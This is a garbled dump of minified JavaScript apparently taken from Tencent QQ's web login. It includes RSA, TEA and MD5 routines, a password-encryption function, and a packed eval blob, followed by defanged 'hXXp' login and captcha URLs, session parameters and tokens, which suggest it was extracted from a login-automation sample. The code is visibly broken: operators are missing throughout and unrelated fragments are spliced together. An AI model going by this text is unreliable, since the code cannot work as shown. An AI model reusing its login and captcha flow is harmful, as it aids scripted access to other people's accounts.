for(var aA=0;aA<this.m.t;  aA){var z=t[aA]&32767;var aB=(z*this.mpl (((z*this.mph (t[aA]>>15)*this.mpl)&this.um)<<15))&t.DM;z=aA this.m.t;t[z] =this.m.am(0,aB,t,aA,0,this.m.t);while(t[z]>=t.DV){t[z]-=t.DV;t[  z]  }}

t.clamp();t.drShiftTo(this.m.t,t);if(t.compareTo(this.m)>=0){t.subTo(this.m,t)}}

function am(t,z){t.squareTo(z);this.reduce(z)}

function y(t,aA,z){t.multiplyTo(aA,z);this.reduce(z)}

f.prototype.convert=aj;f.prototype.revert=at;f.prototype.reduce=P;f.prototype.mulTo=y;f.prototype.sqrTo=am;function i(){return((this.t>0)?(this[0]&1):this.s)==0}

function x(aF,aG){if(aF>4294967295||aF<1){return ar.ONE}

var aE=h(),aA=h(),aD=aG.convert(this),aC=j(aF)-1;aD.copyTo(aE);while(--aC>=0){aG.sqrTo(aE,aA);if((aF&(1<<aC))>0){aG.mulTo(aA,aD,aE)}else{var aB=aE;aE=aA;aA=aB}}

return aG.revert(aE)}

function an(aA,t){var aB;if(aA<256||t.isEven()){aB=new K(t)}else{aB=new f(t)}

return this.exp(aA,aB)}

ar.prototype.copyTo=Y;ar.prototype.fromInt=n;ar.prototype.fromString=w;ar.prototype.clamp=O;ar.prototype.dlShiftTo=aq;ar.prototype.drShiftTo=X;ar.prototype.lShiftTo=s;ar.prototype.rShiftTo=l;ar.prototype.subTo=ab;ar.prototype.multiplyTo=D;ar.prototype.squareTo=Q;ar.prototype.divRemTo=E;ar.prototype.invDigit=B;ar.prototype.isEven=i;ar.prototype.exp=x;ar.prototype.toString=q;ar.prototype.negate=R;ar.prototype.abs=al;ar.prototype.compareTo=G;ar.prototype.bitLength=u;ar.prototype.mod=N;ar.prototype.modPowInt=an;ar.ZERO=c(0);ar.ONE=c(1);var m;var U;var ac;function d(t){U[ac  ]^=t&255;U[ac  ]^=(t>>8)&255;U[ac  ]^=(t>>16)&255;U[ac  ]^=(t>>24)&255;if(ac>=M){ac-=M}}

function T(){d(new Date().getTime())}

if(U==null){U=new Array();ac=0;var I;if(navigator.appName=='Netscape'&&navigator.appVersion<'5'&&window.crypto&&window.crypto.random){var F=window.crypto.random(32);for(I=0;I<F.length;  I){U[ac  ]=F.charCodeAt(I)&255}}

while(ac<M){I=Math.floor(65536*Math.random());U[ac  ]=I>>>8;U[ac  ]=I&255}

function C(){if(m==null){T();m=ao();m.init(U);for(ac=0;ac<U.length;  ac){U[ac]=0}

return m.next()}

function av(z){var t;for(t=0;t<z.length;  t){z[t]=C()}}

ad.prototype.nextBytes=av;function k(){this.i=0;this.j=0;this.S=new Array()}

z=0;for(aB=0;aB<256;  aB){z=(z this.S[aB] aC[aB¬.length])&255;aA=this.S[aB];this.S[aB]=this.S[z];this.S[z]=aA}

k.prototype.init=e;k.prototype.next=a;function ao(){return new k()}

var M=256;function S(aB,aA,z){aA='F20CE00BAE5361F8FA3AE9CEFA495362FF7DA1BA628F64A347F0A8C012BF0B254A30CD92ABFFE7A6EE0DC424CB6166F8819EFA5BCCB20EDFB4AD02E412CCF579B1CA711D55B8B0B3AEB60153D5E0693A2A86F3167D7847A0CB8B00004716A9095D9BADC977CBB804DBDCBA6029A9710869A453F27DFDDF83C016D928B3CBF4C7';z='3';var t=new L();t.setPublic(aA,z);return t.encrypt(aB)}

return{rsa_encrypt:S}}();var r=window||{};(function(r){var s='',a=0,g=[],x=[],y=0,u=0,m=[],t=[],n=true;function e(){return Math.round(Math.random()*4294967295)}

var z='';for(var A=0;A<C.length;A  ){var B=Number(C[A]).toString(16);if(B.length==1){B='0' B}

function v(A){var B='';for(var z=0;z<A.length;z =2){B =String.fromCharCode(parseInt(A.substr(z,2),16))}

var B=[];for(var A=0;A<C.length;A  ){B[A]=C.charCodeAt(A)}

function k(C){var B,D,A=[],z=C.length;for(B=0;B<z;B  ){D=C.charCodeAt(B);if(D>0&&D<=127){A.push(C.charAt(B))}else{if(D>=128&&D<=2047){A.push(String.fromCharCode(192|((D>>6)&31)),String.fromCharCode(128|(D&63)))}else{if(D>=2048&&D<=65535){A.push(String.fromCharCode(224|((D>>12)&15)),String.fromCharCode(128|((D>>6)&63)),String.fromCharCode(128|(D&63)))}}}}

return A.join('')}

function h(B){g=new Array(8);x=new Array(8);y=u=0;n=true;a=0;var z=B.length;var C=0;a=(z 10)%8;if(a!=0){a=8-a}

function q(D){var C=0;var A=new Array(8);var z=D.length;t=D;if(z%8!=0||z<16){return null}

for(var B=0;B<A.length;B  ){A[B]=0}

function f(){var z=t.length;for(var A=0;A<8;A  ){x[A]^=t[y A]}

function o(D,C){var B=[];if(C){for(var A=0;A<D.length;A  ){B[A]=D.charCodeAt(A)&255}}else{var z=0;for(var A=0;A<D.length;A =2){B[z  ]=parseInt(D.substr(A,2),16)}}

r.TEA={encrypt:function(C,B){var A=o(C,B);var z=h(A);return w(z)},enAsBase64:function(E,D){var C=o(E,D);var B=h(C);var z='';for(var A=0;A<B.length;A  ){z =String.fromCharCode(B[A])}

return d.encode(z)},decrypt:function(B){var A=o(B,false);var z=q(A);return w(z)},initkey:function(z,A){s=o(z,A)},bytesToStr:v,strToBytes:c,bytesInStr:w,dataFromStr:o};var d={};d.PADCHAR='=';d.ALPHA='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';d.getbyte=function(B,A){var z=B.charCodeAt(A);if(z>255){throw'INVALID_CHARACTER_ERR: DOM Exception 5'}

return z};d.encode=function(D){if(arguments.length!=1){throw'SyntaxError: Not enough arguments'}

var A=d.PADCHAR;var F=d.ALPHA;var E=d.getbyte;var C,G;var z=[];D='' D;var B=D.length-D.length%3;if(D.length==0){return D}

for(C=0;C<B;C =3){G=(E(D,C)<<16)|(E(D,C 1)<<8)|E(D,C 2);z.push(F.charAt(G>>18));z.push(F.charAt((G>>12)&63));z.push(F.charAt((G>>6)&63));z.push(F.charAt(G&63))}

switch(D.length-B){case 1:G=E(D,C)<<16;z.push(F.charAt(G>>18) F.charAt((G>>12)&63) A A);break;case 2:G=(E(D,C)<<16)|(E(D,C 1)<<8);z.push(F.charAt(G>>18) F.charAt((G>>12)&63) F.charAt((G>>6)&63) A);break}

return z.join('')};if(!window.btoa){window.btoa=d.encode}})(window);var hexcase=1;var b64pad='';var chrsz=8;var mode=32;function md5(s){return hex_md5(s)}

function hex_md5(s){return binl2hex(core_md5(str2binl(s),s.length*chrsz))}

function str_md5(s){return binl2str(core_md5(str2binl(s),s.length*chrsz))}

function hex_hmac_md5(key,data){return binl2hex(core_hmac_md5(key,data))}

function b64_hmac_md5(key,data){return binl2b64(core_hmac_md5(key,data))}

function str_hmac_md5(key,data){return binl2str(core_hmac_md5(key,data))}

function core_md5(x,len){x[len>>5]|=128<<((len)2);x[(((len 64)>>>9)<<4) 14]=len;var a=1732584193;var b=-271733879;var c=-1732584194;var d=271733878;for(var i=0;i<x.length;i =16){var olda=a;var oldb=b;var oldc=c;var oldd=d;a=md5_ff(a,b,c,d,x[i 0],7,-680876936);d=md5_ff(d,a,b,c,x[i 1],12,-389564586);c=md5_ff(c,d,a,b,x[i 2],17,606105819);b=md5_ff(b,c,d,a,x[i 3],22,-1044525330);a=md5_ff(a,b,c,d,x[i 4],7,-176418897);d=md5_ff(d,a,b,c,x[i 5],12,1200080426);c=md5_ff(c,d,a,b,x[i 6],17,-1473231341);b=md5_ff(b,c,d,a,x[i 7],22,-45705983);a=md5_ff(a,b,c,d,x[i 8],7,1770035416);d=md5_ff(d,a,b,c,x[i 9],12,-1958414417);c=md5_ff(c,d,a,b,x[i 10],17,-42063);b=md5_ff(b,c,d,a,x[i 11],22,-1990404162);a=md5_ff(a,b,c,d,x[i 12],7,1804603682);d=md5_ff(d,a,b,c,x[i 13],12,-40341101);c=md5_ff(c,d,a,b,x[i 14],17,-1502002290);b=md5_ff(b,c,d,a,x[i 15],22,1236535329);a=md5_gg(a,b,c,d,x[i 1],5,-165796510);d=md5_gg(d,a,b,c,x[i 6],9,-1069501632);c=md5_gg(c,d,a,b,x[i 11],14,643717713);b=md5_gg(b,c,d,a,x[i 0],20,-373897302);a=md5_gg(a,b,c,d,x[i 5],5,-701558691);d=md5_gg(d,a,b,c,x[i 10],9,38016083);c=md5_gg(c,d,a,b,x[i 15],14,-660478335);b=md5_gg(b,c,d,a,x[i 4],20,-405537848);a=md5_gg(a,b,c,d,x[i 9],5,568446438);d=md5_gg(d,a,b,c,x[i 14],9,-1019803690);c=md5_gg(c,d,a,b,x[i 3],14,-187363961);b=md5_gg(b,c,d,a,x[i 8],20,1163531501);a=md5_gg(a,b,c,d,x[i 13],5,-1444681467);d=md5_gg(d,a,b,c,x[i 2],9,-51403784);c=md5_gg(c,d,a,b,x[i 7],14,1735328473);b=md5_gg(b,c,d,a,x[i 12],20,-1926607734);a=md5_hh(a,b,c,d,x[i 5],4,-378558);d=md5_hh(d,a,b,c,x[i 8],11,-2022574463);c=md5_hh(c,d,a,b,x[i 11],16,1839030562);b=md5_hh(b,c,d,a,x[i 14],23,-35309556);a=md5_hh(a,b,c,d,x[i 1],4,-1530992060);d=md5_hh(d,a,b,c,x[i 4],11,1272893353);c=md5_hh(c,d,a,b,x[i 7],16,-155497632);b=md5_hh(b,c,d,a,x[i 10],23,-1094730640);a=md5_hh(a,b,c,d,x[i 13],4,681279174);d=md5_hh(d,a,b,c,x[i 0],11,-358537222);c=md5_hh(c,d,a,b,x[i 3],16,-722521979);b=md5_hh(b,c,d,a,x[i 6],23,76029189);a=md5_hh(a,b,c,d,x[i 9],4,-640364487);d=md5_hh(d,a,b,c,x[i 12],11,-421815835);c=md5_hh(c,d,a,b,x[i 15],16,530742520);b=md5_hh(b,c,d,a,x[i 2],23,-995338651);a=md5_ii(a,b,c,d,x[i 0],6,-198630844);d=md5_ii(d,a,b,c,x[i 7],10,1126891415);c=md5_ii(c,d,a,b,x[i 14],15,-1416354905);b=md5_ii(b,c,d,a,x[i 5],21,-57434055);a=md5_ii(a,b,c,d,x[i 12],6,1700485571);d=md5_ii(d,a,b,c,x[i 3],10,-1894986606);c=md5_ii(c,d,a,b,x[i 10],15,-1051523);b=md5_ii(b,c,d,a,x[i 1],21,-2054922799);a=md5_ii(a,b,c,d,x[i 8],6,1873313359);d=md5_ii(d,a,b,c,x[i 15],10,-30611744);c=md5_ii(c,d,a,b,x[i 6],15,-1560198380);b=md5_ii(b,c,d,a,x[i 13],21,1309151649);a=md5_ii(a,b,c,d,x[i 4],6,-145523070);d=md5_ii(d,a,b,c,x[i 11],10,-1120210379);c=md5_ii(c,d,a,b,x[i 2],15,718787259);b=md5_ii(b,c,d,a,x[i 9],21,-343485551);a=safe_add(a,olda);b=safe_add(b,oldb);c=safe_add(c,oldc);d=safe_add(d,oldd)}

function core_hmac_md5(key,data){var bkey=str2binl(key);if(bkey.length>16){bkey=core_md5(bkey,key.length*chrsz)}

var ipad=Array(16),opad=Array(16);for(var i=0;i<16;i  ){ipad[i]=bkey[i]^909522486;opad[i]=bkey[i]^1549556828}

var hash=core_md5(ipad.concat(str2binl(data)),512 data.length*chrsz);return core_md5(opad.concat(hash),512 128)}

function str2binl(str){var bin=Array();var mask=(1<<chrsz)-1;for(var i=0;i<str.length*chrsz;i =chrsz){bin[i>>5]|=(str.charCodeAt(i/chrsz)&mask)<<(i2)}

function binl2str(bin){var str='';var mask=(1<<chrsz)-1;for(var i=0;i<bin.length*32;i =chrsz){str =String.fromCharCode((bin[i>>5]>>>(i2))&mask)}

function binl2hex(binarray){var hex_tab=hexcase?'0123456789ABCDEF':'0123456789abcdef';var str='';for(var i=0;i<binarray.length*4;i  ){str =hex_tab.charAt((binarray[i>>2]>>((i%4)*8 4))&15) hex_tab.charAt((binarray[i>>2]>>((i%4)*8))&15)}

function binl2b64(binarray){var tab='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789 /';var str='';for(var i=0;i<binarray.length*4;i =3){var triplet=(((binarray[i>>2]>>8*(i%4))&255)<<16)|(((binarray[i 1>>2]>>8*((i 1)%4))&255)<<8)|((binarray[i 2>>2]>>8*((i 2)%4))&255);for(var j=0;j<4;j  ){if(i*8 j*6>binarray.length*32){str =b64pad}else{str =tab.charAt((triplet>>6*(3-j))&63)}}}

function hexchar2bin(str){var arr=[];for(var i=0;i<str.length;i=i 2){arr.push('\\x' str.substr(i,2))}

arr=arr.join('');eval('var temp = \'' arr '\'');return temp}

function __monitor(mid,probability){if(Math.random()>(probability||1)){return}

try{var url=location.protocol '//ui.ptlogin2.qq.com/cgi-bin/report?id=' mid;var s=document.createElement('img');s.src=url}catch(e){}}

function getEncryption(password,salt,vcode){salt=uin2hex(salt);vcode=vcode||'';password=password||'';var md5Pwd=md5(password),h1=hexchar2bin(md5Pwd),s2=md5(h1 salt),rsaH1=$pt.RSA.rsa_encrypt(h1),rsaH1Len=(rsaH1.length/2).toString(16),hexVcode=r.TEA.strToBytes(vcode.toUpperCase(),true),vcodeLen=Number(hexVcode.length/2).toString(16);while(vcodeLen.length<4){vcodeLen='0' vcodeLen}

while(rsaH1Len.length<4){rsaH1Len='0' rsaH1Len}

r.TEA.initkey(s2);var saltPwd=r.TEA.enAsBase64(rsaH1Len rsaH1 r.TEA.strToBytes(salt) vcodeLen hexVcode);r.TEA.initkey('');return saltPwd.replace(/[\/\ =]/g,function(a){return{'/':'-',' ':'*','=':'_'}[a]})}

function uin2hex(str){var maxLength=16;var hex=parseInt(str).toString(16);var len=hex.length;for(var i=len;i<maxLength;i  ){hex="0" hex}

var arr=[];for(var j=0;j<maxLength;j =2){arr.push("\\x" hex.substr(j,2))}

var result=arr.join("");eval('result="' result '"');return result}getEncryption

&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=21-43-1443602837456&js_ver=10135&js_type=1&login_sig=bX2vEC1My7mgtm3kIVH0UY57UQiklmQQaaq2BdbCVtd39fDjGGywlyInOnozDIje&pt_uistyle=32&aid=549000912&daid=5&pt_qzone_sig=1&

hXXp://ptlogin2.qq.com/login?u=

&js_ver=10135&js_type=1&login_sig=&pt_uistyle=32&aid=549000912&daid=5&pt_qzone_sig=1&

&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=5-23-

hXXp://user.qzone.qq.com/

function time(){return Math.random()}

function time(){return new Date().getTime()}

skey

&appid=549000912&js_ver=10136&js_type=1&login_sig=kfeUZrYNBwRRGcymoO5RMcqKXaknId-Z7Pju9ufQQM5CYzbfYStee8y5nnsqAJuP&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&r=0.25413458029055885

hXXp://captcha.qq.com/cap_union_show?clientype=2&uin=

hXXp://captcha.qq.com/getimgbysig?aid=549000912&uin=

hXXps://ssl.captcha.qq.com/cap_union_new_verify?random=

&cdata=0&collect=OD6q9t0AraWJf+dtq0j8Vvb+EsHRN4ISAFy9iJFDVjGb/tCqzB7i73WR/grOGNF26hh9h0gheM7oZFplWXeMxDOe+tohDnsP7BLjRfD0lX3kJtNsi8yDZmsQ3F76TLCSO6jgiFSM5ke53xeFIU21TZWeWiJ30Kz7Nv2R/p27Ix545qLwUZEMvMITuYdqTld18E+V85mJZ1OeQlLCAU/CdrTIpHgv3d6s4+BMr1tsrR4Ij1HSlAuxatIYV2MzZIQQmfq4I3jhfubjF47vpOoSWhcOlJsku1yqyqiaDMRXO8w71YhimZBMkQnxZZKfiKlZJGwqTmlD4dLcBztbCejCGJ7UwAMpuVKA3eZatiRD0TdXcs9NZwzTkRk9UXLWHZlxYsOQijtFvXFtEWdtRV3+ukwtERrD21YSFFeJZ8/Av+SpJH6KPMPfTnv7SogkKNwPldi/swAIHyBsn5aIbaRdzxr+cgIaZo7QUJZuDawwQUsIenzRMR5bh5R5Kmqjr7pbwteboOb7/ho+QmdAhK/VOG8x08N5KP/7BBI67Y8hx41UUlYhr62v2f8lrmWnBiCXSlLoRCmskgISSDjxMq8Ap5cq7aYF0skNJ3BkJSrRI3Bqxi583P6APKLjWfKNd64a+grN+PxKiZuYo5FP59rzM92cv2i6ACdJ8+ZbuY8M8jpMS/3L+Cvc+Lb7CcQIzTM7Q/e+zNla3fnF9v66+M4YB5pVTl82ovPZAg5AjeB8pEcdQEpNZfCX71uZtXS6I4djTqK6++rXDHknMgy8NgLk4gBuZ3DpPVthU6C2YN/sLqo5JIXxvL76ZMlyRru6U6FfuX1mo51ykq97BqBRIHxTOtZsipXUl/zDoSYDIAD9/VMX1ryeOaZCILmvdIWctCkt3ilRhxH5oUPA+vfqvrSLqQWxV0CS3v2+LU7LVZY7eeDku3j5lXThjBs9FbyF/uaRVGCtge34TMONsXajK9A3vZBcIt24RTyWURg6LmvxhGz7qOA1cBNe7DC2Md/+j5ds1HDevGayXhLMYoM9ogRFeol/xo3lJw4MxVigRTznvuqfDhGbp+ohQ/mwgxauvX6vbt0D7NG6xFxULAUaCqmEtnJZM7hCmqtGUQaWwdaJhG1/h4idWwzmZ/05uPMaykxquEtHXA3ZaqizqfUbH8PRiJvLGle5VOHhRAZDF98ib4Djwsd+mwAeLJBdv8phiWTAoUp/XKejamPoJGe3M5LhpKI6sbQptCvYC7VvBowMxu6NL0hKrUv0fc+1/ixxxqp3Hj1EUz19sH6p4/sLKZQu/az+tA7exAiYRdbY8+1Y87oQrH/ty5b+z55F5VyfLzrzEi/XnSCYNdI7SlA7rEaKFV0DKLGd73+Kc3yON0OoLSfKHjEsyVBMnhUF/rrX232bv+6aoxodNErBDYgowkfnQdgEg2Bq+UPu2WtuwOCU0jdZc/i4ClpgJ+STiQ31Ouys2nv6OwBpk9CgIvGd5NNVcAB4GIC/gsZi22bdsFJMty1uCAH5lOCrD9lJqseLG9WiSSD0dCBVPAdEEtr98Am9SIp7MHroHalsPXGaavYkG4Sii/bv80YiTpIZGZtoI2XVoUnxjhOsV6lvW96ikFHeaE4g4YCRiXdiiys7MoewCN+rzJofk17qnumnZcz6OqM212hiPcihQdzJaY4zTsRdvw==&ans=

aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&noBorder=noborder&showtype=embed&uid=

hXXps://ssl.captcha.qq.com/cap_union_new_getsig?aid=549000912&asig=&captype=&protocol=https&clientype=2&disturblevel=&apptype=2&curenv=inner&noBorder=noborder&showtype=embed&uid=

&pt_randsalt=0&u1=http://qzs.qq.com/qzone/v5/loginsucc.html?para=izone&ptredirect=0&h=1&t=1&g=1&from_ui=1&ptlang=2052&action=8-30-1445255935887&js_ver=10136&js_type=1&login_sig=kfeUZrYNBwRRGcymoO5RMcqKXaknId-Z7Pju9ufQQM5CYzbfYStee8y5nnsqAJuP&pt_uistyle=32&aid=549000912&daid=5&pt_qzone_sig=1&

_0_1_0_0_1|10|11|12|13_5|17|20|9_0_8_1|18&g_tk=

|8_8_

_0|14_

hXXp://r.qzone.qq.com/cgi-bin/right_frame.cgi?uin=

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('Y 1O=X(){X r(){W.n=1d;W.e=0;W.4V=W.3h=W.4k=W.q=W.p=W.d=1d}X B(r,z,I){1d!=r&&("50"==2W r?W.3i(r,z,I):1d==z&&"3T"!=2W r?W.1S(r,1B):W.1S(r,z))}X z(){Z 1u B(1d)}X A(r){Y V=z();V.2c(r);Z V}X D(r){Y z=1,I;0!=(I=r>>>16)&&(r=I,z =16);0!=(I=r>>8)&&(r=I,z =8);0!=(I=r>>4)&&(r=I,z =4);0!=(I=r>>2)&&(r=I,z =2);0!=r>>1&&(z =1);Z z}X C(r){W.m=r}X E(r){W.m=r;W.2a=r.2V();W.2f=W.2a&1N;W.2U=W.2a>>15;W.2T=(1<<r.1e-15)-1;W.2S=2*r.t}X F(){Y r=(1u 3k).3G();L[G  ]^=r&1f;L[G  ]^=r>>8&1f;L[G  ]^=r>>16&1f;L[G  ]^=r>>24&1f;G>=U&&(G-=U)}X O(){}X N(){W.j=W.i=0;W.S=[]}r.1b.2R=X(r){Z r.2Q(W.e,W.n)};r.1b.2P=X(r,z){1d!=r&&1d!=z&&0<r.1c&&0<z.1c?(W.n=1u B(r,16),W.e=1T(z,16)):2O("3l 1O 3p 3r")};r.1b.26=X(r){Y z;z=W.n.2N() 7>>3;1a(z<r.1c 11)2O("3a 3c 3f 19 1O"),z=1d;1h{19(Y I=[],A=r.1c-1;0<=A&&0<z;){Y D=r.1C(A--);I[--z]=D}I[--z]=0;r=1u O;19(A=[];2<z;){19(A[0]=0;0==A[0];)r.2M(A);I[--z]=A[0]}I[--z]=2;I[--z]=0;z=1u B(I)}1a(1d==z)Z 1d;z=W.2R(z);1a(1d==z)Z 1d;z=z.1F(16);Z 0==(z.1c&1)?z:"0" z};Y H;B.1b.1z=X(r,z,A,B,D,C){Y E=z&1N;19(z>>=15;0<=--C;){Y R=W[r]&1N,F=W[r  ]>>15,G=z*R F*E,R=E*R ((G&1N)<<15) A[B] (D&2L);D=(R>>>30) (G>>>15) z*F (D>>>30);A[B  ]=R&2L}Z D};H=30;B.1b.1e=H;B.1b.1s=(1<<H)-1;B.1b.1o=1<<H;B.1b.2K=1p.3d(2,52);B.1b.27=52-H;B.1b.29=2*H-52;Y S=[],K;H=48;19(K=0;9>=K;  K)S[H  ]=K;H=3n;19(K=10;36>K;  K)S[H  ]=K;H=3D;19(K=10;36>K;  K)S[H  ]=K;C.1b.2e=X(r){Z 0>r.s||0<=r.1H(W.m)?r.2J(W.m):r};C.1b.2m=X(r){Z r};C.1b.1A=X(r){r.1Q(W.m,1d,r)};C.1b.1V=X(r,z,A){r.1X(z,A);W.1A(A)};C.1b.1Y=X(r,z){r.25(z);W.1A(z)};E.1b.2e=X(r){Y A=z();r.1w().1L(W.m.t,A);A.1Q(W.m,1d,A);0>r.s&&0<A.1H(B.1x)&&W.m.1m(A,A);Z A};E.1b.2m=X(r){Y A=z();r.1I(A);W.1A(A);Z A};E.1b.1A=X(r){19(;r.t<=W.2S;)r[r.t  ]=0;19(Y z=0;z<W.m.t;  z){Y A=r[z]&1N,B=A*W.2f ((A*W.2U (r[z]>>15)*W.2f&W.2T)<<15)&r.1s,A=z W.m.t;19(r[A] =W.m.1z(0,B,r,z,0,W.m.t);r[A]>=r.1o;)r[A]-=r.1o,r[  A]  }r.1q();r.2b(W.m.t,r);0<=r.1H(W.m)&&r.1m(W.m,r)};E.1b.1V=X(r,z,A){r.1X(z,A);W.1A(A)};E.1b.1Y=X(r,z){r.25(z);W.1A(z)};B.1b.1I=X(r){19(Y z=W.t-1;0<=z;--z)r[z]=W[z];r.t=W.t;r.s=W.s};B.1b.2c=X(r){W.t=1;W.s=0>r?-1:0;0<r?W[0]=r:-1>r?W[0]=r 1o:W.t=0};B.1b.1S=X(r,z){Y A;1a(16==z)A=4;1h 1a(8==z)A=3;1h 1a(1B==z)A=8;1h 1a(2==z)A=1;1h 1a(32==z)A=5;1h 1a(4==z)A=2;1h{W.3I(r,z);Z}W.s=W.t=0;19(Y D=r.1c,C=!1,E=0;0<=--D;){Y J;8==A?J=r[D]&1f:(J=S[r.1C(D)],J=1d==J?-1:J);0>J?"-"==r.1l(D)&&(C=!0):(C=!1,0==E?W[W.t  ]=J:E A>W.1e?(W[W.t-1]|=(J&(1<<W.1e-E)-1)<<E,W[W.t  ]=J>>W.1e-E):W[W.t-1]|=J<<E,E =A,E>=W.1e&&(E-=W.1e))}8==A&&0!=(r[0]&2I)&&(W.s=-1,0<E&&(W[W.t-1]|=(1<<W.1e-E)-1<<E));W.1q();C&&B.1x.1m(W,W)};B.1b.1q=X(){19(Y r=W.s&W.1s;0<W.t&&W[W.t-1]==r;)--W.t};B.1b.1L=X(r,z){Y A;19(A=W.t-1;0<=A;--A)z[A r]=W[A];19(A=r-1;0<=A;--A)z[A]=0;z.t=W.t r;z.s=W.s};B.1b.2b=X(r,z){19(Y A=r;A<W.t;  A)z[A-r]=W[A];z.t=1p.4R(W.t-r,0);z.s=W.s};B.1b.2k=X(r,z){Y A=r%W.1e,B=W.1e-A,D=(1<<B)-1,C=1p.1P(r/W.1e),E=W.s<<A&W.1s,F;19(F=W.t-1;0<=F;--F)z[F C 1]=W[F]>>B|E,E=(W[F]&D)<<A;19(F=C-1;0<=F;--F)z[F]=0;z[C]=E;z.t=W.t C 1;z.s=W.s;z.1q()};B.1b.2n=X(r,z){z.s=W.s;Y A=1p.1P(r/W.1e);1a(A>=W.t)z.t=0;1h{Y B=r%W.1e,D=W.1e-B,C=(1<<B)-1;z[0]=W[A]>>B;19(Y E=A 1;E<W.t;  E)z[E-A-1]|=(W[E]&C)<<D,z[E-A]=W[E]>>B;0<B&&(z[W.t-A-1]|=(W.s&C)<<D);z.t=W.t-A;z.1q()}};B.1b.1m=X(r,z){19(Y A=0,B=0,D=1p.3b(r.t,W.t);A<D;)B =W[A]-r[A],z[A  ]=B&W.1s,B>>=W.1e;1a(r.t<W.t){19(B-=r.s;A<W.t;)B =W[A],z[A  ]=B&W.1s,B>>=W.1e;B =W.s}1h{19(B =W.s;A<r.t;)B-=r[A],z[A  ]=B&W.1s,B>>=W.1e;B-=r.s}z.s=0>B?-1:0;-1>B?z[A  ]=W.1o B:0<B&&(z[A  ]=B);z.t=A;z.1q()};B.1b.1X=X(r,z){Y A=W.1w(),D=r.1w(),C=A.t;19(z.t=C D.t;0<=--C;)z[C]=0;19(C=0;C<D.t;  C)z[C A.t]=A.1z(0,D[C],z,C,0,A.t);z.s=0;z.1q();W.s!=r.s&&B.1x.1m(z,z)};B.1b.25=X(r){19(Y z=W.1w(),A=r.t=2*z.t;0<=--A;)r[A]=0;19(A=0;A<z.t-1;  A){Y B=z.1z(A,z[A],r,2*A,0,1);(r[A z.t] =z.1z(A 1,2*z[A],r,2*A 1,B,z.t-A-1))>=z.1o&&(r[A z.t]-=z.1o,r[A z.t 1]=1)}0<r.t&&(r[r.t-1] =z.1z(A,z[A],r,2*A,0,1));r.s=0;r.1q()};B.1b.1Q=X(r,A,C){Y E=r.1w();1a(!(0>=E.t)){Y F=W.1w();1a(F.t<E.t)1d!=A&&A.2c(0),1d!=C&&W.1I(C);1h{1d==C&&(C=z());Y M=z(),J=W.s;r=r.s;Y G=W.1e-D(E[E.t-1]);0<G?(E.2k(G,M),F.2k(G,C)):(E.1I(M),F.1I(C));E=M.t;F=M[E-1];1a(0!=F){Y H=F*(1<<W.27) (1<E?M[E-2]>>W.29:0),K=W.2K/H,H=(1<<W.27)/H,L=1<<W.29,Q=C.t,N=Q-E,P=1d==A?z():A;M.1L(N,P);0<=C.1H(P)&&(C[C.t  ]=1,C.1m(P,C));B.1U.1L(E,P);19(P.1m(M,M);M.t<E;)M[M.t  ]=0;19(;0<=--N;){Y O=C[--Q]==F?W.1s:1p.1P(C[Q]*K (C[Q-1] L)*H);1a((C[Q] =M.1z(0,O,C,N,0,E))<O)19(M.1L(N,P),C.1m(P,C);C[Q]<--O;)C.1m(P,C)}1d!=A&&(C.2b(E,A),J!=r&&B.1x.1m(A,A));C.t=E;C.1q();0<G&&C.2n(G,C);0>J&&B.1x.1m(C,C)}}}};B.1b.2V=X(){1a(1>W.t)Z 0;Y r=W[0];1a(0==(r&1))Z 0;Y z=r&3,z=z*(2-(r&15)*z)&15,z=z*(2-(r&1f)*z)&1f,z=z*(2-((r&1G)*z&1G))&1G,z=z*(2-r*z%W.1o)%W.1o;Z 0<z?W.1o-z:-z};B.1b.2G=X(){Z 0==(0<W.t?W[0]&1:W.s)};B.1b.2E=X(r,A){1a(1r<r||1>r)Z B.1U;Y C=z(),E=z(),F=A.2e(W),G=D(r)-1;19(F.1I(C);0<=--G;)1a(A.1Y(C,E),0<(r&1<<G))A.1V(E,F,C);1h Y J=C,C=E,E=J;Z A.2m(C)};B.1b.1F=X(r){1a(0>W.s)Z"-" W.1Z().1F(r);1a(16==r)r=4;1h 1a(8==r)r=3;1h 1a(2==r)r=1;1h 1a(32==r)r=5;1h 1a(4==r)r=2;1h Z W.3o(r);Y z=(1<<r)-1,A,B=!1,C="",D=W.t,E=W.1e-D*W.1e%r;1a(0<D--)19(E<W.1e&&0<(A=W[D]>>E)&&(B=!0,C="2A".1l(A));0<=D;)E<r?(A=(W[D]&(1<<E)-1)<<r-E,A|=W[--D]>>(E =W.1e-r)):(A=W[D]>>(E-=r)&z,0>=E&&(E =W.1e,--D)),0<A&&(B=!0),B&&(C ="2A".1l(A));Z B?C:"0"};B.1b.1Z=X(){Y r=z();B.1x.1m(W,r);Z r};B.1b.1w=X(){Z 0>W.s?W.1Z():W};B.1b.1H=X(r){Y z=W.s-r.s;1a(0!=z)Z z;Y A=W.t,z=A-r.t;1a(0!=z)Z z;19(;0<=--A;)1a(0!=(z=W[A]-r[A]))Z z;Z 0};B.1b.2N=X(){Z 0>=W.t?0:W.1e*(W.t-1) D(W[W.t-1]^W.s&W.1s)};B.1b.2J=X(r){Y A=z();W.1w().1Q(r,1d,A);0>W.s&&0<A.1H(B.1x)&&r.1m(A,A);Z A};B.1b.2Q=X(r,z){Y A;A=1B>r||z.2G()?1u C(z):1u E(z);Z W.2E(r,A)};B.1x=A(0);B.1U=A(1);Y T,L,G;1a(1d==L){L=[];19(G=0;G<U;)H=1p.1P(3t*1p.2z()),L[G  ]=H>>>8,L[G  